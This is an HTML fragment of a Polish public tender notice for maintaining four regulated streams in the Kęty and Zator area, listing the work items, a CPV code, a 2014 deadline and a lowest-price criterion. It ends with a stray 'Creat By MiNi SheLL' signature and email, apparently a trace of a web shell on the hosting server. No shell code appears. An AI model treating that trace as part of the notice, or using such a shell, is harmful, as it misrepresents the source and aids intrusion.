<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacja urządzeń melioracji podstawowych:
1.Uregulowany potok Kanał Ulgi Nowa Wieś w km 0+200-2+571 w msc. Nowa Wieś, gm. Kęty, pow. oświęcimski.
2.Uregulowany potok Czarczówka w km 0+200-2+571 w msc. Grodzisko, Graboszyce, gm. Zator, pow. oświęcimski.
3.Uregulowany potok Leśniówka w km 0+000-4+055 w msc. Kęty, gm. Kęty, pow. oświęcimski.
4.Uregulowany potok Bulówka w km 0+000-2+400 w msc. Kęty, gm. Kęty, pow. oświęcimski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Uregulowany potok Kanał Ulgi Nowa Wieś w km 0+200-2+571 w msc. Nowa Wieś, gm. Kęty, pow. oświęcimski.
Wykoszenie porostów ręczne ze skarp wraz z wygrabieniem,	Ręczne ścinanie i karczowanie zakrzaczeń z wywiezieniem,Usuwanie zatorów i przetamowań w dnie oraz usunięcie nanosów z płyt betonowych,Usunięcie kożucha z roślin pływających i korzeniących się w dnie,Wykonanie narzutu kamiennego w dnie,Odwóz części materiału z usunięcia zatorów i przetamowań.
2.Uregulowany potok Czarczówka w km 0+200-2+571 w msc. Grodzisko, Graboszyce, gm. Zator, pow. oświęcimski.
Wykoszenie porostów ręczne ze skarp wraz z wygrabieniem,Ręczne ścinanie i karczowanie zakrzaczeń z wywiezieniem,Usunięcie zatorów i przetamowań w dnie oraz nanosów z płyt betonowych,Usunięcie kożucha z roślin pływających i korzeniących się w dnie,Odwóz części materiału z usunięcia zatorów i przetamowań.
3.Uregulowany potok Leśniówka w km 0+000-4+055 w msc. Kęty, gm. Kęty, pow. oświęcimski.
Wykoszenie porostów ręczne ze skarp wraz z wygrabieniem,	Ręczne ścinanie i karczowanie zakrzaczeń z wywiezieniem,Usunięcie zatorów i przetamowań,	Usunięcie kożucha z roślin pływających i korzeniących się w dnie,	Usunięcie namułu z płyt z wywiezieniem.
4.Uregulowany potok Bulówka w km 0+000-2+400 w msc. Kęty, gm. Kęty, pow. oświęcimski.
Wykoszenie porostów ręczne ze skarp wraz z wygrabieniem,	Ręczne ścinanie i karczowanie zakrzaczeń z wywiezieniem,Usunięcie zatorów i przetamowań,	Usunięcie kożucha z roślin pływających i korzeniących się w dnie,	Usunięcie namułu z płyt z wywiezieniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com